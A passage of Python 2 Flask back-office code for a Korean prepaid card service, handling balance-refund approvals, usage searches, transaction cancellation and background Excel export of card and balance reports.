startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'cardNumber' : getParameter(form_data, "cardNumber"),
'customerName' : getParameter(form_data,"customerName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'endDate' : endDate,
'dateOrderType': getParameter(form_data, "dateOrderType"),
'dateOrderDesc': getParameter(form_data, "dateOrderDesc"),
'procStatus' : getParameter(form_data, "procStatus"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length"))
}
result_data = getApiData("/card/approveCardBalnaceRefunds" ,queryData , API_SERVER_BACKOFFICE)
return json.dumps(result_data)
@cardApi.route("/api/card/balanceRefund/list/excel", methods=['GET'])
def balanceRefundListExcel():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'cardNumber' : getParameter(form_data, "cardNumber"),
'customerName' : getParameter(form_data,"customerName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'endDate' : endDate,
'dateOrderType': getParameter(form_data, "dateOrderType"),
'dateOrderDesc': getParameter(form_data, "dateOrderDesc"),
'procStatus' : getParameter(form_data, "procStatus"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length")),
'excelAllFlag':'1',
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardRefundExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#잔액환불 완료
@cardApi.route("/api/card/balanceRefund/approve", methods=["POST"])
def cardbalanceRefundApprove():
form_data = request.json
approvalData = {
'refundList' : form_data,
'empId': session['empId']
}
resultData = request_post("/card/CardBalnaceRefund/approve", approvalData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
#잔액환불 거부
@cardApi.route("/api/card/balanceRefund/reject", methods=["POST"])
def cardbalanceRefundReject():
form_data = request.json
print(form_data)
approvalData = {
'refundList' : getParameter(form_data, "refundList"),
'reqMemo' : getParameter(form_data, "refundDesc"),
'empId': session['empId']
}
resultData = request_post("/card/CardBalnaceRefund/reject", approvalData, API_SERVER_BACKOFFICE)
return json.dumps(resultData)
@cardApi.route("/api/card/usages", methods=['GET'])
def usages():
form_data = json.loads(request.args.get("formData"))
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0]).split(" ")[0]
startTime = paramEscape(searchDate[0]).split(" ")[1] + "00"
endDate = paramEscape(searchDate[1]).split(" ")[0]
endTime = paramEscape(searchDate[1]).split(" ")[1] + "59"
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
queryData = {
'cardNumber' : target == "1" and cardNumber or "",
'orderNo' : target == "2" and cardNumber or "",
'serviceId' : target == "3" and cardNumber or "",
'startGiftNo' : paramEscape(getParameter(form_data, "startGiftNo")),
'endGiftNo' : paramEscape(getParameter(form_data, "endGiftNo")),
'amount' : paramEscape(getParameter(form_data, "amount")),
'merchantName' : getParameter(form_data, "merchantName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'startTime' : startTime,
'endDate' : endDate,
'endTime' : endTime,
'storeName' : getParameter(form_data,"storeName"),
'storeCode' : getParameter(form_data,"storeCode"),
'status' : getParameter(form_data, "status"),
'payKind' : getParameter(form_data, "payKind"),
'payMethod' : getParameter(form_data, "payMethod"),
'order' : getParameter(form_data, "order"),
'offset' : setStringToNumber(getParameter({},"start")),
'limit' : setStringToNumber(getParameter({},"length"))
}
result_data = postListApiData("/admin/v1/card/usages" ,queryData , API_SERVER_KPC_LEGACY)
return json.dumps(result_data)
@cardApi.route('/api/card/usages/excel', methods=['GET'])
def usagesExcelAll():
form_data = {}
searchDate = getParameter(form_data , "searchDate").split(' - ')
startDate = paramEscape(searchDate[0]).split(" ")[0]
startTime = paramEscape(searchDate[0]).split(" ")[1] + "00"
endDate = paramEscape(searchDate[1]).split(" ")[0]
endTime = paramEscape(searchDate[1]).split(" ")[1] + "59"
target = getParameter(form_data, "target")
cardNumber = paramEscape(getParameter(form_data, "cardNumber"))
queryData = {
'cardNumber' : target == "1" and cardNumber or "",
'orderNo' : target == "2" and cardNumber or "",
'serviceId' : target == "3" and cardNumber or "",
'startGiftNo' : paramEscape(getParameter(form_data, "startGiftNo")),
'endGiftNo' : paramEscape(getParameter(form_data, "endGiftNo")),
'amount' : paramEscape(getParameter(form_data, "amount")),
'merchantName' : getParameter(form_data, "merchantName"),
'dateType' : getParameter(form_data, "dateType"),
'startDate' : startDate,
'startTime' : startTime,
'endDate' : endDate,
'endTime' : endTime,
'storeName' : getParameter(form_data,"storeName"),
'storeCode' : getParameter(form_data,"storeCode"),
'status' : getParameter(form_data, "status"),
'payKind' : getParameter(form_data, "payKind"),
'payMethod' : getParameter(form_data, "payMethod"),
'order' : getParameter(form_data, "order"),
'offset' : 0,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
def cardExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드정보_'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"거래처명")
worksheet.write(row, 1 ,"서비스명")
worksheet.write(row, 2 ,"점포코드")
worksheet.write(row, 3 ,"점포명(사용처)")
worksheet.write(row, 4 ,"구분")
worksheet.write(row, 5 ,"지불수단")
worksheet.write(row, 6 ,"지불형태")
worksheet.write(row, 7 ,"영업일")
worksheet.write(row, 8 ,"거래일")
worksheet.write(row, 9 ,"거래시간")
worksheet.write(row, 10 ,"거래번호")
worksheet.write(row, 11 ,"승인번호")
worksheet.write(row, 12 ,"금액")
worksheet.write(row, 13 ,"사용카드번호")
while True :
result_data = postListApiData("/admin/v1/card/usages" ,queryData , API_SERVER_KPC_LEGACY)
for data in result_data["data"]:
row += 1
worksheet.write(row, 0 ,data["merchantName"])
worksheet.write(row, 1 ,data["serviceName"])
worksheet.write(row, 2 ,data["posCode"])
worksheet.write(row, 3 ,data["posName"])
worksheet.write(row, 4 ,data["payStatus"])
worksheet.write(row, 5 ,data["payMethod"])
worksheet.write(row, 6 ,data["payType"])
worksheet.write(row, 7 ,parseDate(data["businessDate"] ,'%Y%m%d' ,'%Y-%m-%d'))
worksheet.write(row, 8 ,parseDate(data["approvalDate"] ,'%Y%m%d%H%M%S' ,'%Y-%m-%d'))
worksheet.write(row, 9 ,parseDate(data["approvalDate"] , '%Y%m%d%H%M%S', '%H:%M:%S'))
worksheet.write(row, 10 ,data["orderNo"])
worksheet.write(row, 11 ,data["approvalNo"])
worksheet.write_number(row, 12 ,long(data["amount"]), money_format)
worksheet.write(row, 13 ,data["cardNumber"])
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드정보_' + datetime.now().strftime('%Y%m%d') + '_' + str(fileCnt) + '.xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"거래처명")
worksheet.write(row, 1 ,"서비스명")
worksheet.write(row, 2 ,"점포코드")
worksheet.write(row, 3 ,"점포명(사용처)")
worksheet.write(row, 4 ,"구분")
worksheet.write(row, 5 ,"지불수단")
worksheet.write(row, 6 ,"지불형태")
worksheet.write(row, 7 ,"영업일")
worksheet.write(row, 8 ,"거래일")
worksheet.write(row, 9 ,"거래시간")
worksheet.write(row, 10 ,"거래번호")
worksheet.write(row, 11 ,"승인번호")
worksheet.write(row, 12 ,"금액")
worksheet.write(row, 13 ,"사용카드번호")
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
'''
결제,충전에 대한 거래 취소 API
'''
@cardApi.route("/api/card/cancelCardDeal", methods=['POST'])
def cancelCardDeal():
data = request.json
cardData = {
"onlineId" : paramEscape(getParameter(data,"merchantId")), #온라인아이디
"onlinePwd" : paramEscape(getParameter(data,"merchantPwd")), #온라인아이디 비밀번호
"approvalNo" : paramEscape(getParameter(data,"approvalNo")), #승인번호
"approvalDate" : paramEscape(getParameter(data,"approvalDate")), #승인시간
"cardNo" : paramEscape(getParameter(data,"cardNo")), #카드번호
"orderNo" : paramEscape(getParameter(data,"orderNo")), #거래번호
"transactionCode" : paramEscape(getParameter(data,"transactionCode")), #거래코드(결제취소:PC, 충전취소:CC)
"amount" : paramEscape(getParameter(data,"amount")), #거래금액
"requestDate" : datetime.now().strftime('%Y%m%d%H%M%S'), #요청일자
"cancelType" : paramEscape(getParameter(data,"cancelType")), #취소타입(D1: 전체취소) 해당 API는 전체취소
"cancelMemo" : paramEscape(getParameter(data,"cancelMemo")), #취소사유
"branchCode" : paramEscape(getParameter(data,"posCode")) #점포코드
}
return json.dumps(cancelCardDealApi("/CardService/admin/v1/card/transaction", {}, cardData))
'''
결제,충전 취소에 대한 내부 cardService-api
'''
def cancelCardDealApi(apiUrl ,data , queryData):
readData = {
"status" : "",
"message" : "",
}
try :
url = apiUrl
if (len(queryData) > 0) :
url = url + "?" + urlencode(queryData)
conn = httplib.HTTPConnection(getServerUrl(API_SERVER_KPC_LEGACY), timeout=120)
print(url)
conn.request('POST', url, json.dumps(data), headers={"Content-Type" : "application/json; charset=utf-8"})
response = conn.getresponse()
readResponseData = response.read()
print(readResponseData)
readData = json.loads(readResponseData)
except HTTPError as err:
readData["status"] = err.code
errorMsg = "오류가 발생하였습니다.\n해당 메시지를 스크린 캡쳐하여 담당자에 문의 바랍니다.\n" + err.read()
readData["message"] = errorMsg
return readData
@cardApi.route("/api/card/restrictHistory", methods=["GET"])
def getCardRestirctHistory():
queryData = {
'giftNo': getParameter({},"giftNo"),
'start': getParameter({},"start"),
'length': getParameter({},"length")
}
return json.dumps(getApiData("/admin/v1/card/restrict", queryData, API_SERVER_KPC_LEGACY))
def cardRefundExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'잔액환불 내역_'+ queryData['startDate'] + '~' + queryData['endDate'] +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 잔액환불정보 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '잔액환불 내역_' + queryData['startDate'] + '~' + queryData['endDate'] + '_' + str(fileCnt) + '.xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호")
worksheet.write(row, 1 ,"카드번호")
worksheet.write(row, 2 ,"진행상태")
worksheet.write(row, 3 ,"고객명")
worksheet.write(row, 4 ,"접수일")
worksheet.write(row, 5 ,"승인일")
worksheet.write(row, 6 ,"환불일")
worksheet.write(row, 7 ,"접수시 잔액")
worksheet.write(row, 8 ,"환불 수수료")
worksheet.write(row, 9 ,"실환불금액")
worksheet.write(row, 10 ,"환불은행")
worksheet.write(row, 11 ,"환불계좌")
worksheet.write(row, 12 ,"예금주")
while True :
result_data = getApiData("/card/approveCardBalnaceRefunds" ,queryData , API_SERVER_BACKOFFICE)
for data in result_data["data"]:
row += 1
receptionDt = data["receptionDt"];
approvalDt = data["approvalDt"];
refundDt = data["refundDt"];
if receptionDt != None :
receptionDt = datetime.fromtimestamp(data["receptionDt"] / 1e3)
receptionDt = receptionDt.strftime('%Y-%m-%d')
if data["approvalDt"] != None :
approvalDt = datetime.fromtimestamp(data["approvalDt"] / 1e3)
approvalDt = approvalDt.strftime('%Y-%m-%d')
if data["refundDt"] != None :
refundDt = datetime.fromtimestamp(data["refundDt"] / 1e3)
refundDt = refundDt.strftime('%Y-%m-%d')
else :
refundDt = '-'
worksheet.write(row, 0 ,row)
worksheet.write(row, 1 ,data["cardNumber"])
worksheet.write(row, 2 ,'환불'+data["statusName"])
worksheet.write(row, 3 ,data["customerName"])
worksheet.write(row, 4 ,receptionDt)
worksheet.write(row, 5 ,approvalDt)
worksheet.write(row, 6 ,refundDt)
worksheet.write(row, 7 ,long(data["balance"]), money_format)
worksheet.write(row, 8 ,long(data["refundCommision"]), money_format)
worksheet.write(row, 9 ,long(data["balance"])-long(data["refundCommision"]), money_format)
worksheet.write(row, 10 ,data["bankName"])
worksheet.write(row, 11 ,data["bankAccNo"])
worksheet.write(row, 12 ,data["bankHolder"])
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '잔액환불 내역_' + queryData['startDate'] + '~' + queryData['endDate'] + '_' + str(fileCnt) + '.xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호")
worksheet.write(row, 1 ,"카드번호")
worksheet.write(row, 2 ,"진행상태")
worksheet.write(row, 3 ,"고객명")
worksheet.write(row, 4 ,"접수일")
worksheet.write(row, 5 ,"승인일")
worksheet.write(row, 6 ,"환불일")
worksheet.write(row, 7 ,"접수시 잔액")
worksheet.write(row, 8 ,"환불 수수료")
worksheet.write(row, 9 ,"실환불금액")
worksheet.write(row, 10 ,"환불은행")
worksheet.write(row, 11 ,"환불계좌")
worksheet.write(row, 12 ,"예금주")
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(result_data["data"]) < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
#카드 기간별 잔액 관리 리스트 요청
@cardApi.route("/api/card/balance/daily-balance-list", methods=['GET'])
def cardDailyBalanceList():
formData = json.loads(request.args.get("formData"))
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'limit' : setStringToNumber(getParameter({},"length")),
'offset' : setStringToNumber(getParameter({},"start")),
'orderBy' : getParameter(formData, "orderBy")
}
result_data = getApiData("/balance/daily-balance-list" , queryData ,API_SERVER_BACKOFFICE)
return json.dumps(result_data)
#카드 기간별 잔액 관리 리스트 엑셀 다운로드 요청
@cardApi.route("/api/card/balance/daily-balance-list/excelAll", methods=['GET'])
def cardDailyBalanceListExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardDailyBalanceListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#카드 기간별 잔액 관리 리스트 엑셀 다운로드 처리
def cardDailyBalanceListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_잔액관리'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 잔액관리 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'});
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
while True :
searchData = getApiData("/balance/daily-balance-list" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["balanceDate"], money_format)
worksheet.write(row, 2 ,data["prevBalance"], money_format)
worksheet.write(row, 3 ,data["chargeAmount"], money_format)
worksheet.write(row, 4 ,data["cancelChargeAmount"], money_format)
worksheet.write(row, 5 ,data["chargeSum"], money_format)
worksheet.write(row, 6 ,data["payAmount"], money_format)
worksheet.write(row, 7 ,data["cancelPayAmount"], money_format)
worksheet.write(row, 8 ,data["paySum"], money_format)
worksheet.write(row, 9 ,data["refundAmount"], money_format)
worksheet.write(row, 10 ,data["balance"], money_format)
# worksheet.write(row, 7 ,parseDate(data["expireDt"] ,'%Y-%m-%d %H:%M:%S.0','%Y-%m-%d'), string_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["prevBalance"], summary_money_format)
worksheet.write(row, 3 ,summaryData["chargeAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["cancelChargeAmount"], summary_money_format)
worksheet.write(row, 5 ,summaryData["chargeSum"], summary_money_format)
worksheet.write(row, 6 ,summaryData["payAmount"], summary_money_format)
worksheet.write(row, 7 ,summaryData["cancelPayAmount"], summary_money_format)
worksheet.write(row, 8 ,summaryData["paySum"], summary_money_format)
worksheet.write(row, 9 ,summaryData["refundAmount"], summary_money_format)
worksheet.write(row, 10 ,summaryData["balance"], summary_money_format)
# worksheet.write(row, 7 ,parseDate(data["expireDt"] ,'%Y-%m-%d %H:%M:%S.0','%Y-%m-%d'), string_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_잔액관리(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"일자", title_format)
worksheet.write(row, 2 ,"이월잔액", title_format)
worksheet.write(row, 3 ,"충전", title_format)
worksheet.write(row, 4 ,"충전취소", title_format)
worksheet.write(row, 5 ,"충전합계", title_format)
worksheet.write(row, 6 ,"결제", title_format)
worksheet.write(row, 7 ,"결제취소", title_format)
worksheet.write(row, 8 ,"결제합계", title_format)
worksheet.write(row, 9 ,"환불", title_format)
worksheet.write(row, 10 ,"잔액", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
#카드 기간별 잔액 관리 거래별 요약조회 리스트 요청
#(충전:TRNT-0001, 결제:TRNT-0002, 환불:TRNT-0003)
@cardApi.route("/api/card/balance/transaction-summary", methods=['GET'])
def cardDailyBalanceTransactionSummary():
formData = json.loads(request.args.get("formData"))
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
transactionType = request.args.get("transactionType");
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': transactionType,
'limit' : setStringToNumber(getParameter({},"length")),
'offset' : setStringToNumber(getParameter({},"start")),
}
result_data = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
return json.dumps(result_data)
#카드 기간별 잔액 관리 거래별 요약조회 리스트 엑셀 다운로드 요청
#충전합계: TRNT-0001(충전)
@cardApi.route("/api/card/balance/transaction-summary/cargeSum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryCargeSumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0001",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardChargeSumListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#카드 기간별 잔액 관리 거래별 요약조회 리스 엑셀 다운로드 처리
#충전합계: TRNT-0001(충전)
def cardChargeSumListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_충전합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 충전합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'});
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
worksheet.write(row, 2 ,data["transactionAmount"], money_format)
worksheet.write(row, 3 ,data["cancelTransactionAmount"], money_format)
worksheet.write(row, 4 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionAmount"], summary_money_format)
worksheet.write(row, 3 ,summaryData["cancelTransactionAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_충전합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"충전", title_format)
worksheet.write(row, 3 ,"충전취소", title_format)
worksheet.write(row, 4 ,"충전합계", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
